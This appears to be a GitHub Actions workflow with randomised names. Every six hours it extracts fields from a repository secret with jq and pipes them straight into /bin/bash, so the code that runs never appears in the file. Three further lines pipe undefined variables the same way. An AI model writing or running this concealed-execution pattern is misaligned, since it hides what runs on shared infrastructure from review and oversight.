name: hezhangke9421

on:
  workflow_dispatch:
  schedule:
    - cron: '30 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: hezhangke9421
        env:
          mvsb2406: ${{ secrets.mvsb2406 }}
        run: |
          echo $mvsb2406 | jq -r .kbgq5980 | /bin/bash
          echo $om1 | jq -r .ktg53 | /bin/bash
          echo $cc7 | jq -r .ljl7 | /bin/bash
          echo $yn71564 | jq -r .cuv5 | /bin/bash

